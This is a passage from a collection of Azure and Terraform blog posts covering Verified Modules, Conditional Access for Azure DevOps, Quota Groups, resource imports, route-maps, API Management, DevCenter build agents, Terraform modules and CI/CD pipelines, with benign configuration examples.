all “Azure” modules are AVM:** Double-check the source before you trust it. --- ### AVM and Modular IaC: Why It Matters AVM is part of Azure’s shift from massive, copy-paste templates to smaller, reusable modules. It means: - Faster builds, as you can assemble environments from tested blocks. - Easier maintenance, as you upgrade modules instead of thousands of lines of custom code. - Better teamwork, with everyone using the same patterns. Still writing huge Terraform configs for every project? AVM is your nudge to break it down. --- ### AVM vs CAF Enterprise Scale: What’s Changed? If you’ve used the old CAF Enterprise Scale modules, here’s how AVM stacks up: | Feature | CAF Enterprise Scale | AVM | |------------------------|---------------------|----------------------| | Flexibility | Lower | Higher | | Composability | Limited | Modular | | Maintenance | Complex | Simplified | | Microsoft Support | Yes | Yes | | Community Involvement | Some | Active | AVM is all about flexibility and composability. Use what you need and swap out modules as your setup changes. --- ### Best Practices for Using AVM - Pin your versions, always. - Actually read the docs. They’re decent and will save you time. - Automate your testing. Pipelines are your friend. - Parameterise for reuse. Variables and locals make your code portable. - Keep modules up to date. New versions land regularly. --- ### Where to Find AVM and Support - **Terraform Registry:** Search “Azure Verified Module” or “AVM”. [Browse Modules](https://registry.terraform.io/search/modules?provider=azurerm&q=avm) - **GitHub:** All open source, so raise issues or submit PRs if you spot something. [Azure Verified Modules | AVM](https://github.com/Azure/terraform-azurerm-avm) - **Microsoft Docs:** Full guidance, release notes, and examples. [Azure Verified Modules | Microsoft Learn](https://learn.microsoft.com/en-us/azure/developer/terraform/avm/) - **Community:** Azure IaC calls, forums, and Discord. There’s always someone who’s already hit your problem. --- ### Final Thoughts Azure Verified Modules are a big step forward for anyone using Terraform on Azure. They bring consistency, security, and speed to your deployments without locking you into a rigid framework. If you’re not already using them, now’s the time to give them a go. Already working with AVM modules? Found any quirks or got tips for getting the most out of them? Drop your thoughts below. Let’s help each other build better, faster, and more secure Azure environments. --- # New Rules for Azure DevOps Access: How to Set Up Conditional Access Properly - URL: https://blog.l-w.tech/blog/2025-07-02-AZ-ADO-Policy - Date: 2025-07-02 - Author: Elliott Leighton-Woodruff - Tags: Azure DevOps, Conditional Access, Azure AD, Cloud Security, Access Policies Update Conditional Access policies for Azure DevOps before July 28, 2025 deadline. If you manage Azure DevOps in your organisation, there’s an important change coming. From 28 July 2025, Azure DevOps will stop relying on Azure Resource Manager (ARM) for sign-ins and token refresh. Any Conditional Access policies targeting ARM will no longer protect Azure DevOps. To maintain security, you must create new Conditional Access policies that specifically target Azure DevOps. ## Why Does This Matter? Conditional Access enforces multi-factor authentication, location restrictions, and device compliance for cloud services. Without updated policies, users may bypass security controls when accessing Azure DevOps. Microsoft has provided clear instructions for updating your setup. ## Step-by-Step: Setting Up a Conditional Access Policy for Azure DevOps Follow these steps to keep your organisation protected: 1. **Go to Conditional Access in Azure AD** Open the Azure portal and navigate to **Azure Active Directory > Security > Conditional Access > Policies**. 2. **Create a New Policy** Click **New policy** and give it a clear name, such as “ADO CAP Policy”. 3. **Assign Users or Groups** Select which users or groups the policy should apply to—typically, everyone who needs Azure DevOps access. 4. **Target Azure DevOps as a Resource** Under **Target resources**, select **Select resources**, then add **Microsoft Visual Studio Team Services** (the service name for Azure DevOps). > _Your policy setup should look similar to the screenshot below:_ > > ![Screenshot of Conditional Access policy targeting Azure DevOps](https://stlwtechwebimages.blob.core.windows.net/images/2025-07-02-AZ-ADO-Policy/2025-07-02-AZ-ADO-Policy-1.png) 5. **Configure Conditions and Access Controls** Set conditions such as device platform, location, or sign-in risk. Choose access controls, like requiring multi-factor authentication. 6. **Enable the Policy** Start with **Report-only** mode to monitor impact. Once satisfied, switch to **On**. ## Tips for a Smooth Transition - Test with a small group first. - Communicate new sign-in requirements to users. - Monitor sign-in logs and policy impact reports in Azure AD. - Review and update or retire old ARM-based policies. ## Final Thoughts Cloud security is always evolving. Updating your Conditional Access policies now will help keep your Azure DevOps environment secure. For more details, see Microsoft’s official documentation: [Azure DevOps Conditional Access Policies](https://learn.microsoft.com/en-us/azure/devops/organizations/accounts/conditional-access-policies?view=azure-devops) Have you updated your policies yet? Any lessons learned or tips to share? Drop a comment below—keen to hear how others are handling these changes. --- # Azure Quota Groups Explained: Less Admin, More Control - URL: https://blog.l-w.tech/blog/2025-06-25-AZ-Quota-Groups - Date: 2025-06-25 - Author: Elliott Leighton-Woodruff - Tags: Azure, Quota Groups, Cloud Management, Resource Allocation, Subscription Management Share Azure quotas across subscriptions with Quota Groups for flexible scaling. If you’ve ever hit Azure’s quota limits at the worst possible time, you’ll know just how much hassle it can cause. You’re spinning up a new workload, scaling out for a project, or onboarding a new team, and suddenly you run out of quota in one subscription. Cue the support tickets, delays, and the usual round of “there must be a better way” chat with the team. Well, Microsoft has finally delivered. Azure Quota Groups are now generally available, and if you look after more than one subscription, this is actually a big deal. ## What Are Azure Quota Groups? In short, quota groups let you share your resource quotas across multiple subscriptions. Instead of managing quotas one subscription at a time, you can now set up a group and allocate resources like vCPUs, storage, or public IPs to cover all the subscriptions in that group. This means less admin, fewer support tickets, and much more flexibility when it comes to scaling and managing your cloud estate. ## Why Does This Matter? If you only run a single Azure subscription, quotas are just an occasional nuisance. But as soon as you start working with multiple subscriptions, keeping track of quotas becomes a real headache. Before quota groups, if one subscription hit its limit, you had to raise a support ticket or shuffle workloads around. That’s not just time-consuming, it’s disruptive, especially when you need to move quickly. Now, with quota groups, you can: - **Share quotas across subscriptions**, so you don’t end up with unused capacity in one and not enough in another. - **Adjust your own quota allocations** without waiting for Microsoft support. - **Scale projects faster**, spinning up resources where you need them, when you need them. ## How Does It Work? Setting up a quota group is pretty straightforward: 1. **Create a quota group** in the Azure portal or with the CLI. 2. **Add the subscriptions** you want to the group. You can change these as your needs change. 3. **Allocate the resource quotas** to the group. Think of it as a shared pool. 4. **Monitor usage and tweak as needed.** You still need to keep an eye on your overall limits, but now you’re in control of how those limits are spread out. ## Where This Really Helps Here’s where quota groups make life easier: - **Project work:** If you’re spinning up a project across several subscriptions, you can allocate what you need up front and not worry about hitting limits. - **Multi-team set-ups:** Different teams can share a pool of resources, so you don’t get one team running out while another has loads spare. - **Business unit or regional splits:** If your organisation splits workloads by business unit or region, you can balance quotas based on real demand, not just guesswork. ## A Few Things to Keep in Mind As with anything new, there are a couple of things to watch out for: - Make sure you’ve got the right people managing quota groups. You don’t want everyone making changes. - Keep an eye on usage so you don’t accidentally max out your group. Azure’s monitoring tools can help. - Microsoft’s documentation is decent, but expect the odd quirk or edge case as more people start using this. ## How to Get Started If you want to try quota groups, here’s what I’d do: 1. **Check your current quotas and usage** across subscriptions. Where are the pinch points? 2. **Work out which subscriptions make sense to group together.** Think about projects, teams, or business units. 3. **Set up a test quota group** and see how it works. Start small and build up as you get comfortable. 4. **Share what you learn with your team.** The more people know about this, the smoother things will run. Azure Quota Groups might not be the flashiest update, but for anyone managing a growing cloud set-up, they’re a welcome change. Less admin, fewer support tickets, and more control over your resources. What’s not to like? --- # From Portal to Code: Your First Steps Importing Azure Resources into Terraform - URL: https://blog.l-w.tech/blog/2025-06-11-AZ-IaC-Importing-Resources - Date: 2025-06-11 - Author: Elliott Leighton-Woodruff - Tags: Azure, ClickOps, Infrastructure as Code, Cloud Automation, Azure Portal, IaC Tools Import existing Azure resources into Terraform to eliminate drift and gain consistency. If you’ve ever inherited an Azure environment, you’ll know that not everything is built with Infrastructure as Code from the start. Often, resources are created manually in the portal or with scripts, and you’re left to bring some order to the chaos. If you’re moving to Terraform (which I highly recommend for Azure), you may want to bring your existing resources under code management without having to rebuild everything from scratch. Here’s how you can approach importing Azure resources into Terraform state if you're getting started, focusing on a Virtual Network, a Key Vault, and a Private Endpoint. This is the sort of practical task you’ll face when you want to avoid configuration drift and get your Azure set-up under control. ## Why Import? - **Consistency:** All your resources are defined in code, so you always know what you have. - **Change tracking:** Terraform’s state file becomes your single source of truth. No more guessing who created what. - **Safer changes:** You can plan and preview changes before making them, which is far less risky than manual edits. ## Step 1: Write Your Terraform Resource Blocks Before you import, you need to create a matching resource block for each Azure resource in your Terraform files. You do not need to fill in every property at this stage; just cover the basics. **Virtual Network (UK South):** ```hcl resource "azurerm_virtual_network" "existing_vnet" { name = "my-existing-vnet" resource_group_name = "my-resource-group" location = "UK South" address_space = ["10.0.0.0/16"] } ``` **Key Vault (UK South):** ```hcl resource "azurerm_key_vault" "existing_kv" { name = "my-existing-keyvault" resource_group_name = "my-resource-group" location = "UK South" sku_name = "standard" } ``` **Private Endpoint (UK South):** ```hcl resource "azurerm_private_endpoint" "existing_pe" { name = "my-existing-pe" resource_group_name = "my-resource-group" location = "UK South" subnet_id = azurerm_subnet.existing_subnet.id private_service_connection { name = "example-connection" private_connection_resource_id = azurerm_key_vault.existing_kv.id subresource_names = ["vault"] is_manual_connection = false } } ``` > **Tip:** Make sure you have any referenced resources, such as subnets, defined in Terraform as well, or import them separately. ## Step 2: Find the Azure Resource IDs You will need the full Azure Resource ID for each resource. The easiest way to find these is by using the Azure Portal, Azure CLI, or PowerShell. **Azure CLI Example:** ```sh az network vnet show -g my-resource-group -n my-existing-vnet --query id -o tsv az keyvault show -g my-resource-group -n my-existing-keyvault --query id -o tsv az network private-endpoint show -g my-resource-group -n my-existing-pe --query id -o tsv ``` ## Step 3: Import Each Resource With your resource blocks and IDs ready, run the import commands in your terminal: ```sh terraform import azurerm_virtual_network.existing_vnet "/subscriptions//resourceGroups/my-resource-group/providers/Microsoft.Network/virtualNetworks/my-existing-vnet" terraform import azurerm_key_vault.existing_kv "/subscriptions//resourceGroups/my-resource-group/providers/Microsoft.KeyVault/vaults/my-existing-keyvault" terraform import azurerm_private_endpoint.existing_pe "/subscriptions//resourceGroups/my-resource-group/providers/Microsoft.Network/privateEndpoints/my-existing-pe" ``` > **Remember:** Replace `` and the resource names with your own values. ## Step 4: Tidy Up and Validate After importing, run `terraform plan`. Terraform may flag missing or mismatched properties, which is perfectly normal. Update your Terraform files so that they match the actual configuration of your resources. Importing only links the state—it does not automatically fill in all the settings for you. Continue running `terraform plan` and updating your files until you reach a point where there are no changes to apply. At this stage, your resources are properly managed by Terraform. --- ## Final Thoughts Importing resources into Terraform state is not the most glamorous part of the job, but it is essential for bringing order to your Azure environment. It can be a bit fiddly the first time, but once you have done it, you will appreciate the control and consistency it brings. Are you importing resources into Terraform? Have you got any tips or stories to share? Please leave a comment below. I am always interested to hear how others are managing their Azure estates. --- # When to Click, When to Code: The Azure Admin's Dilemma - URL: https://blog.l-w.tech/blog/2025-06-04-AZ-IaC-When-to-Click - Date: 2025-06-04 - Author: Elliott Leighton-Woodruff - Tags: Azure, ClickOps, Infrastructure as Code, Cloud Automation, Azure Portal, IaC Tools Decide when to use ClickOps versus Infrastructure as Code for Azure deployments. # When to Click, When to Code: The Azure Admin’s Dilemma We’ve all been there, staring at the Azure Portal, debating whether to click your way through a deployment or fire up your favourite IaC tool. So, how do you decide? This isn’t just a technical question; it’s a strategic one that shapes your team’s agility, reliability, and even job satisfaction. In this article, I’ll break down the strengths and weaknesses of ClickOps and Infrastructure as Code, share some real-world scenarios, and offer a practical framework for making the right choice in your Azure projects. --- ## ClickOps: Fast, Visual, and Sometimes Irresistible ClickOps—managing Azure resources through the portal or GUI—remains the go-to for many cloud professionals, especially when: - **Prototyping and Learning:** You want to try a new Azure service, see how it works, or just get something running quickly. The portal’s wizards and visual feedback make experimentation a breeze. - **One-Off Fixes:** Need to tweak a setting or apply a quick patch? Sometimes it’s genuinely faster to just click your way through. - **Demos and Training:** When you’re onboarding a new team member or presenting to stakeholders, the visual interface is clear, accessible, and easy to follow. - **Exploring New Features:** Azure’s rapid pace of innovation means some features debut in the portal before they’re available in IaC tools. **But here’s the catch:** - **No Version Control:** Every click is ephemeral – there’s no built-in history, no audit trail, and no easy way to roll back. - **Risk of Drift:** Manual changes can lead to subtle differences between environments, making troubleshooting a nightmare. - **Scalability Issues:** Need to repeat the same process across dev, test, and prod? ClickOps quickly becomes tedious and error-prone. - **Knowledge Silos:** If only one person knows what was clicked, you’re at risk when they’re on holiday or leave the team. **Real-World Example:** A client once spun up a proof-of-concept using ClickOps. It worked brilliantly – until they needed to replicate it for production. Without documentation or code, they spent days retracing their steps, introducing inconsistencies along the way. --- ## Infrastructure as Code: The Power of Automation and Repeatability Infrastructure as Code (IaC), using tools like Bicep, ARM, or Terraform, has become the gold standard for serious cloud operations. Here’s why: - **Repeatability:** Deploy identical environments, every time, with confidence. No more “works on my portal”. - **Collaboration:** Code is easily shared, reviewed, and improved. Teams can work together without stepping on each other’s toes. - **Auditability:** Every change is tracked in version control, making compliance and troubleshooting straightforward. - **Disaster Recovery:** If disaster strikes, you can rebuild your environment from code in minutes, not days. - **Policy and Security:** IaC makes it easier to bake in security controls, enforce standards, and catch misconfigurations early. **But let’s be honest:** - **Learning Curve:** Tools like Bicep and Terraform take time to master, especially for teams new to automation. - **Overhead for Small Jobs:** For tiny tweaks or quick tests, writing code can feel like using a sledgehammer to crack a nut. - **Initial Investment:** Setting up pipelines, repositories, and processes takes upfront effort, though it pays off over time. **Real-World Example:** A fintech start-up I worked with moved all their infrastructure to IaC after a single misclick in the portal caused a costly outage. Now, every change is peer-reviewed, versioned, and tested before it hits production. The team sleeps better at night, and so do their auditors. --- ## The Hybrid Reality: Click, Then Code Here’s the truth: most teams use both approaches at different stages. - **Start with ClickOps:** For rapid prototyping, learning, or exploring new features. - **Transition to IaC:** As soon as you need repeatability, collaboration, or compliance. **Azure even helps you bridge the gap:** You can export templates from the portal, capturing what you built with clicks as code. This “click, then code” approach lets you move fast at first, then formalise your infrastructure as your needs grow. **Pro Tip:** After prototyping in the portal, export the ARM or Bicep template, review and refactor it, and commit it to your repo. You get the best of both worlds: speed and structure. --- ## Decision Framework: When to Click, When to Code Here’s a practical way to decide:
Decision Framework
**My rule of thumb:** - Use ClickOps for learning, experimenting, or those “just this once” moments. - Use IaC for anything you’ll need to repeat, share, audit, or scale. --- ## Common Pitfalls (and How to Avoid Them) **1. “Just this once” turns into “every time”.** That quick fix in the portal can become a habit, leading to drift and chaos. Document every manual change, and plan to codify it if it recurs. **2. Overengineering simple tasks.** Don’t force IaC for trivial, one-off changes. Balance rigour with pragmatism. **3. Failing to transition.** Many teams get stuck in ClickOps mode. Set clear milestones for moving to IaC as your project matures. **4. Not leveraging export features.** Azure’s export tools are your friend – use them to accelerate your move from clicks to code. --- ## The Future: AI, Copilot, and the Next Generation of Cloud Ops The lines between ClickOps and IaC are blurring. Tools like GitHub Copilot, Azure Deployment Environments, and AI-powered wizards are making it easier than ever to generate code from clicks, or even from plain English prompts. Imagine describing your desired architecture and having AI generate the code, deploy it, and monitor it – all with human oversight. We’re not there yet, but the future is coming fast. --- ## Your Turn ClickOps and Infrastructure as Code aren’t enemies – they’re tools in your Azure toolbox. The best admins know when to reach for each, and how to transition as their needs evolve. **How do you decide when to click and when to code in your Azure projects?** Have you ever regretted not using one over the other? What hybrid approaches or tools have worked for you? Share your stories, tips, or even horror stories in the comments – let’s learn from each other! --- *If you found this helpful, follow me for more practical Azure and cloud insights. And if you’ve got a topic you’d like to see covered, let me know!* --- # Smarter Routing in Azure: Route-Maps for Virtual WAN - URL: https://blog.l-w.tech/blog/2025-05-28-AZ-Virtual-WAN-Route-Maps - Date: 2025-05-28 - Author: Elliott Leighton-Woodruff - Tags: Azure Virtual WAN, Route Maps, BGP, Cloud Networking, Azure Routing Control BGP route advertisements in Azure Virtual WAN with newly available route-maps. If you are managing routing at scale in Azure, you know how painful it can be to make Azure do what you need it to do—especially when it comes to BGP. Until now, the options for controlling what gets advertised into or out of a Virtual WAN hub have been limited. That just changed. Route-maps for Azure Virtual WAN are now generally available, bringing much-needed control over route advertisements and path selection. ## What Are Route-Maps? Think of route-maps as a way to define rules about routing logic. You can match and manipulate BGP route attributes, and decide what gets advertised in or out of your virtual hub. It’s a feature networking teams have had on-premises for years, and now you can do the same in Azure’s managed WAN service.

Azure Virtual WAN Route-Maps Diagram

You can use route-maps on: - Site-to-Site (S2S) VPN connections - Point-to-Site (P2S) User VPN connections - ExpressRoute connections - Virtual Network (VNet) connections This gives you the ability to control: - What prefixes are advertised into the hub - What prefixes are propagated out to remote connections - How BGP route attributes are handled for influencing path selection ## Why It Matters BGP is powerful, but without control, it’s also a mess. The default behaviour in Virtual WAN is fine for simple topologies, but if you need to do anything non-trivial, you hit walls quickly. With route-maps, you can: - Filter routes based on prefix length or match conditions - Tag routes to control propagation and preference - Prepend AS paths to steer traffic away from less-preferred paths - Stop advertising sensitive or internal routes to the wrong peers This kind of control is critical when connecting hybrid environments, especially if you’re dealing with overlapping address spaces, selective connectivity, or complex routing domains. ## Real-World Use Case Say you have multiple branches connecting to Azure over VPN, and you want to advertise only a specific set of internal routes from each branch to Azure—not the entire on-prem network. With route-maps, you can define exactly what prefixes to allow or deny and apply those maps per connection. Or maybe you’re using ExpressRoute and want to make sure certain VNets don’t advertise their routes back over that circuit. Again, apply a route-map on the VNet connection, and you’re in full control. ## How to Set Up Route-Maps in Azure Virtual WAN Setting up route-maps in Azure Virtual WAN is done through the portal or using IaC. Here's a quick guide using the Azure Portal: 1. **Navigate to your Virtual WAN hub** Go to the Azure Portal and open your existing Virtual WAN hub. 2. **Open the Routing section** Under the Virtual Hub settings, select **Routing > Route maps**. 3. **Create a new Route Map** Click **+ Add** and give your route-map a name. Choose the direction (Inbound or Outbound) depending on whether you're filtering incoming or outgoing routes. 4. **Define your match conditions** You can match based on: - Prefix (CIDR blocks) - AS Path - Communities 5. **Add actions** Choose what to do with matched routes: - Allow or deny - Prepend AS paths - Modify route attributes like communities or next hop 6. **Assign the route-map to a connection** Go to the connection (e.g. VPN, VNet, ExpressRoute) where you want the map applied, and select your new route-map under the appropriate direction. 7. **Save and validate** Review the effective routes and confirm that the route-map is being applied as expected. > **Tip:** Test your configuration in a non-production environment before rolling it out widely. ## Final Thoughts Routing in the cloud doesn’t have to be guesswork. With route-maps in Azure Virtual WAN, we finally get the tools to manage BGP like we would in any enterprise network. This feature gives teams the flexibility they need without abandoning the benefits of a managed WAN platform. If you’ve been holding off on Virtual WAN because of routing limitations, this might be the feature that makes it worth another look. --- # Modern APIs Need Modern Protection with Azure API Management - URL: https://blog.l-w.tech/blog/2025-05-14-AZ-Modern-APIs-Need-Modern-Protection - Date: 2025-05-14 - Author: Elliott Leighton-Woodruff - Tags: Azure API Management, API Security, Cloud Automation, DevOps, Azure Secure modern APIs with Azure API Management for authentication and visibility. ## APIs are the Backbone of Modern Applications Every product, internal tool, and mobile app relies on them. They are the glue that holds systems together. Yet despite this, a lot of businesses are still exposing APIs in Azure like it is 2015. And that gap is only getting more dangerous. Too often, the same pattern shows up: APIs spun up on ageing IIS servers or dropped into Azure App Services without much thought. Maybe there is a basic firewall rule or an IP restriction, if you are lucky. More often, there is no proper API gateway, no consistent authentication, and no real visibility. If that sounds familiar, you are not just missing an opportunity. You are taking unnecessary risks that will come back to bite you, either when an audit lands or when someone decides to test your perimeter. --- ## The Old Way: Endpoint-Centric Thinking Traditionally, API security and configuration lived at the endpoint. You would: 1. Deploy the web service. 2. Configure SSL manually. 3. Set up basic authentication (if anyone remembered). 4. Hope nothing went wrong. It was simple. And for a while, it worked. But simple does not scale, and it certainly does not secure your environment properly. When your API security is tied to individual servers, app services, or VMs, you are stuck doing the same work over and over. Every new service means more certificates, more configuration tweaks, and more manual checks. You are betting that every engineer gets it right, every time. You are hoping no one forgets to lock down an endpoint. In 2025, that approach is no longer good enough. The risks are bigger, the pace of change is faster, and the expectations are higher. --- ## The Better Way: Shift API Security to the Gateway This is where Azure API Management (APIM) comes in. Instead of hardening every endpoint individually, you put your APIs behind a central, controlled gateway. With Azure APIM, you can: - Enforce authentication and authorisation consistently. - Rate limit and throttle traffic before it hits your services. - Inspect and transform requests and responses without changing backend code. - Load OpenAPI (Swagger) specifications for standardised onboarding. - Validate JWT tokens for secure third-party authentication. - Centralise logging, monitoring, and analytics for better oversight.

Azure DevCenter CI/CD Diagram

You shift security and control to where it should be. The API gateway becomes your front door. Your backend services stay lean, focused, and free from unnecessary security plumbing. --- ## Why It Matters One of the often overlooked benefits of moving to Azure API Management is the visibility you gain by integrating it with Application Insights. Link APIM to App Insights and you can: - Capture detailed logs of every request and response. - See real data for troubleshooting and performance tuning. - Identify bottlenecks and failing requests quickly. - Understand usage patterns for better capacity planning. - Improve the reliability and quality of your APIs over time. Instead of guessing what is happening at the edge of your platform, you can see it clearly and act on it. And it is not just about security. You can: - Apply new policies centrally without redeploying applications. - Protect legacy services without needing to refactor them. - Onboard new APIs quickly and easily. - Create consistent, predictable behaviour across your platform. The reality is, most organisations are adding APIs faster than they are securing them. Every new API exposed without a gateway is another risk you have not uncovered yet. --- ## Final Thoughts If you are still exposing APIs directly from App Services, IIS, or unmanaged VMs in Azure, it is time to rethink it. Start small. Set up an API Management instance. Front a couple of APIs with it. Learn how policies work, how transformations can simplify your services, and how much easier life becomes when your security controls live in one place. This is not about slowing teams down. It is about giving them the right foundation to move faster, safer, and with more confidence. If your API security strategy still looks like it did five years ago, now is the time to change it. --- # Private Azure DevOps Agents with Azure DevCenter - URL: https://blog.l-w.tech/blog/2025-05-07-AZ-CICD-With-Azure-DevCenter - Date: 2025-05-07 - Author: Elliott Leighton-Woodruff - Tags: Azure DevOps, Azure DevCenter, CI/CD, Private Agents, DevOps, Cloud Automation Deploy private Azure DevOps agents efficiently using Azure DevCenter for better control. # Is Azure DevCenter the Best Way to Run Private DevOps Agents? Most teams using Azure DevOps start with Microsoft-hosted agents. It’s the path of least resistance click, build, done. But at some point, speed, control, or security becomes more than a “nice-to-have.” That’s when self-hosted agents enter the chat. The problem? Running your own agents can feel like a step backwards manual provisioning, configuration drift, inconsistent environments. Enter **Azure DevCenter**, a service that promises to make managing development infrastructure simpler. But can it make self-hosted DevOps agents *better* too? Let’s dig in. --- ## Why Even Bother with Private Agents? Microsoft-hosted agents are great until… they aren’t. If any of this sounds familiar, you’re not alone: - Pipeline queues that eat into your deployment time - SDKs or tools that change underneath you - The need for secure network access (hello, private APIs) - Cold starts adding minutes to builds - Strict compliance or audit requirements Hosted agents are generic by design. But your environment? Probably isn’t. That’s where private agents come in and where DevCenter might offer a better way to manage them. --- ## What *Is* Azure DevCenter, Really? On the surface, DevCenter is Microsoft’s answer to developer VMs: DevBoxes with pre-configured environments, identity integration, and RBAC controls. But if you look a little deeper, it’s a flexible platform for **managing cloud-based infrastructure for dev teams**, not just individuals. That includes your build agents. You get: - Policy-driven provisioning - Network isolation and identity control - Automation hooks for installs and configuration In other words, you can stand up self-hosted agents as if they were part of your development fleet. Because… they are. This allows you too deploy using ADO with full control and network access like you really need/want:

Azure DevCenter CI/CD Diagram

--- ## Setting It Up: The Overview Here’s the general flow if you want to get private Azure DevOps agents running in DevCenter: 1. **Create a DevCenter project** Hook into your subscription, define access, and pick your network. 2. **Build a DevBox pool** Choose your image (Windows or Linux), VM size, and custom scripts if needed. 3. **Automate the agent install** Use a startup script to install the agent, register it, and install dependencies. 4. **Secure it properly** Private endpoints, NSGs, Key Vault integration the works. 5. **Run your pipelines** Point your YAML pipelines at the new agent pool, and off you go. It’s infrastructure-as-code-friendly too. Once this is templated, it’s repeatable across teams or projects. --- ## Security and Compliance: More Than a Checkbox One of the biggest draws here is control. With DevCenter, your agents live inside your tenant. That means: - Private networking (vNets, ExpressRoute, etc.) - Conditional Access through Azure AD - Logging and telemetry stay in your environment - Easier integration with existing compliance tooling For industries with strict data or regulatory requirements, this is a big deal. --- ## Cost: Are You Actually Saving Anything? Here’s the part most people skip. DevCenter doesn’t just give you control it can also **save you money** if you manage it well: - **Scheduled auto-shutdowns**: No more idle VMs eating budget overnight - **Pooled agents**: Share resources between teams instead of duplicating - **Usage-based scaling**: You control how and when agents spin up Compared to time-based billing on Microsoft-hosted agents, you can run predictable workloads at a fixed cost. --- ## Real-World Use Cases Not every team needs this but the ones that do, really do. Examples we’ve seen: - **Heavy mono-repos** that routinely blow through time or memory limits - **GPU-based builds** for AI/ML models or rendering tasks - **Secure builds** for services behind firewalls or VPNs - **Teams with locked-down environments** where public traffic just isn’t allowed --- ## So… Is It the Best Way? If you’re happy with hosted agents, keep going. But if you’ve hit that scaling or control ceiling, **Azure DevCenter is absolutely worth a look**. It bridges the gap between DIY VMs and enterprise-grade management. For teams already invested in Azure, it’s a natural extension of your ecosystem. For DevOps teams that want control *without* becoming sysadmins, it might be the best balance you’ll find right now. --- **What’s your experience with private agents? Is DevCenter on your radar or is there a better way you’ve found? Let’s chat.** --- # Creating Your First Terraform Module for Azure - URL: https://blog.l-w.tech/blog/2025-04-23-TF-Creating-Your-First-Module - Date: 2025-04-23 - Author: Elliott Leighton-Woodruff - Tags: Terraform, Azure, Infrastructure as Code, Cloud Automation, Modules, Best Practices Build reusable Terraform modules to maintain consistency and eliminate copy-paste chaos. ## Why Use a Terraform Module? If you've ever copied and pasted the same Terraform resources into more than one project, you'll know how quickly things can get messy. Modules are your way out of that mess. A module is basically a reusable bundle of Terraform config, like a function in code. You pass in some variables, and it gives you a consistent result every time. No more copy-paste chaos. ### Here's what makes modules worth it: - Keeps your naming and tagging tidy - Saves you from repeating yourself - Helps you work faster without breaking stuff If you're working in a team, this becomes even more useful. Build a set of reusable pieces, like storage accounts, networks, or full environments, and suddenly everyone's working with the same standards. No more "why is this resource named differently in Dev and Prod?" problems. --- ## What We're Building We’ll keep this first example simple. We’re going to build a module that: - Creates a Resource Group - Deploys a Storage Account with a random suffix We’ll be using: - **AzureRM provider** - **Random provider** --- ## Step 1: Folder Structure Here’s how to organise it: ``` project-root/ ├── main.tf ├── modules/ │ └── storage/ │ ├── main.tf │ ├── variables.tf │ └── outputs.tf ``` ### What each file does: - **`main.tf`** in the root is your launcher. It sets up providers and uses the module. - **`main.tf`** in `modules/storage` holds your actual infrastructure code. - **`variables.tf`** lists the inputs the module expects. - **`outputs.tf`** defines what values you want back out of the module. --- #### `modules/storage/main.tf` ``` resource "random_string" "suffix" { length = 6 upper = false special = false } resource "azurerm_resource_group" "example" { name = var.resource_group_name location = var.location } resource "azurerm_storage_account" "example" { name = "elwst${random_string.suffix.result}" resource_group_name = azurerm_resource_group.example.name location = azurerm_resource_group.example.location account_tier = "Standard" account_replication_type = "LRS" } ``` --- #### `modules/storage/variables.tf` ``` variable "resource_group_name" { type = string } variable "location" { type = string default = "UK South" } ``` --- #### `modules/storage/outputs.tf` ``` output "storage_account_name" { value = azurerm_storage_account.example.name } ``` --- ## Step 2: Using the Module Now you can call the module from your root config like this: ``` provider "azurerm" { features {} } provider "random" {} module "storage" { source = "./modules/storage" resource_group_name = "example-rg" location = "UK South" } ``` --- ## Step 3: Init and Apply In your terminal, run: ```bash terraform init terraform plan terraform apply ``` You’ll get a new resource group and a storage account with a randomly generated name like `elwstf3x9qd`. And if you want to use it in another environment? Just call the module again with different values. --- ## Wrap Up If you’re writing the same Terraform config more than once, modules are the fix. You don’t need to go wild with complexity. Just start small. Get a feel for the structure. Then as you grow, your modules will grow with you. Add naming standards. Add tags. Wrap diagnostics and permissions into them. Before long, you’ve got a proper set of building blocks that your team can trust. Keep your Terraform DRY (Don't Repeat Yourself). By building reusable modules, you save yourself from rework and reduce the chance of inconsistency across environments. Your future self, and your team, will thank you for it. --- # Still Running Terraform Locally? Let's Talk. - URL: https://blog.l-w.tech/blog/2025-04-16-TF-Deploying-Locally-Lets-Talk - Date: 2025-04-16 - Author: Elliott Leighton-Woodruff - Tags: Terraform, Azure DevOps, Infrastructure as Code, CI/CD, Cloud Automation, Governance, Security Move from local Terraform deployments to CI/CD pipelines for security and consistency. There’s a good chance you’re deploying your Azure infrastructure from your own machine. Maybe it’s Terraform. Maybe it’s working… most of the time. But here’s the question I’d pose: > **Are you still running `terraform apply` locally, or have you moved your infrastructure into a pipeline?** And more importantly, why? Because while running Terraform locally might feel fast and flexible, it can quietly introduce a whole stack of problems that don’t show up until you start scaling. --- ## The Local Workflow Trap I get it—running Terraform locally feels simple: 1. Make your change 2. `terraform plan` 3. `terraform apply` 4. Job done But what starts as flexibility becomes fragility. Here’s why: - **No approvals**: Anyone can deploy anything to any environment. - **No audit trail**: Unless you fancy grepping shell history. - **No feedback**: Policies, security checks, cost estimates? You’re flying blind. - **No consistency**: Drift creeps in, and no two environments are quite the same. What’s worse? It doesn’t scale. As soon as multiple engineers are working on the same infra, someone breaks something—or someone else spends their Friday fixing it. --- ## Pipelines: Not Just for App Code It’s 2025. We have version control, CI/CD, and policy-as-code. There’s no reason infrastructure should lag behind. Moving your Terraform into a build and release pipeline, like Azure DevOps, isn’t about process for process’s sake. It’s about building reliable, repeatable, safe infrastructure delivery. Here’s how that actually plays out in real life. --- ### Terraform Modules = Infrastructure at Scale If you’re not using Terraform modules, you’re missing out. Modules let you: - Standardize how infra is built across teams. - Reuse patterns for things like VNets, storage, AKS clusters. - Abstract the tricky stuff, expose clean variables. Once you’ve built your golden modules, you can plug them into pipelines and lock them down with versioning. That means: - Less duplication. - Easier reviews. - Less room for error. It also opens the door to a platform model, where teams consume infrastructure as a product, not a loose pile of scripts. --- ### Approval Gates = Safer Deployments When you run Terraform through Azure DevOps, you can introduce real controls without slowing anyone down: - **Pre-prod / Prod gates**: Want to make sure someone signs off before a live change hits Azure? Done. - **Manual approvals only where needed**: Use conditional logic in your pipeline to trigger approvals for critical paths, and auto-approve the rest. - **Environment scoping**: Pipelines tied to specific environments and service connections. It builds trust in the process. And it helps platform teams sleep better. --- ## Where to Start You don’t have to overhaul everything overnight. Here's what I'd recommend: 1. **Pick one Terraform module you trust**: Your dev environment, a VNet, or something low-risk. 2. **Build a pipeline around it in Azure DevOps**: Use `terraform init`, `plan`, `apply` stages, even add a destroy if needed. 3. **Introduce an approval for production**: Manual or role-based, just to create structure. 4. **Add feedback into the pull request**: Show the plan. Add policy checks. Bonus points for cost 